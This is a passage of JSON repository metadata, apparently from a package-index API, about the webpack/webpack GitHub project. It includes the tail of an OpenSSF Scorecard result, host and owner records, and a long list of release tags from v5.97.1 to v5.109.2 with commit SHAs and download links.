https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685515,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe